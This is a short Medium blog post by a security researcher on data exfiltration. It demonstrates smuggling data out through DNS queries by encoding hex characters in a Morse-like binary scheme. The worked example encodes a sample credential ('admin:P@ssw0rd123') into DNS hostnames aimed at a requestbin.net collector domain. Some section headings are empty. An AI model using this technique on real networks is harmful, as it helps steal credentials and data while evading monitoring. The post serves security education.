Data Exfiltration over DNS Queries via Morse Code

What is Data Exfiltration?

  • Bulk Data Exfiltration: transfers large volumes of data, sometimes random data and useless for the attacker. This method is mostly employed by malware or ransomware. Most probable, after data is extracted, the target system will be encrypted.
  • Specific Data Exfiltration: attackers search for an exact file or information on the compromised machine. Almost every time, the attack’s main purpose is getting hands on that piece of information.

Why to exfiltrate over DNS?

Why NOT to exfiltrate over DNS?

How to exfiltrate over DNS via Morse Code

(Source: dcoder.fr)
0 = 11111
1 = 01111
2 = 00111
3 = 00011
4 = 00001
5 = 00000
6 = 10000
7 = 11000
8 = 11100
9 = 11110
A = 01
B = 1000
C = 1010
D = 100
E = 0
F = 0010
Delimiter = .
61646d696e3a50407373773072643132330a
61646d696e 
3a50407373
7730726431
32330a
10000.01111.10000.00001.10000.100.10000.11110.10000.0
00011.01.00000.11111.00001.11111.11000.00011.11000.00011
11000.11000.00011.11111.11000.00111.10000.00001.00011.01111
00011.00111.00011.00011.11111.01
10000.01111.10000.00001.10000.100.10000.11110.10000.0.8b2d8cddf0d118c84688.d.requestbin.net00011.01.00000.11111.00001.11111.11000.00011.11000.00011.8b2d8cddf0d118c84688.d.requestbin.net11000.11000.00011.11111.11000.00111.10000.00001.00011.01111.8b2d8cddf0d118c84688.d.requestbin.net00011.00111.00011.00011.11111.01.8b2d8cddf0d118c84688.d.requestbin.net

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Cristian Cornea

Cristian Cornea

1.7K Followers

🇷🇴 Cyber Security Enthusiast, Freelancer, Researcher, Bug Bounty Hunter and InfoSec Writer | OSEP | OSWE | OSCP | CEH | CPTC | PenTest+ | eWPT | ECIH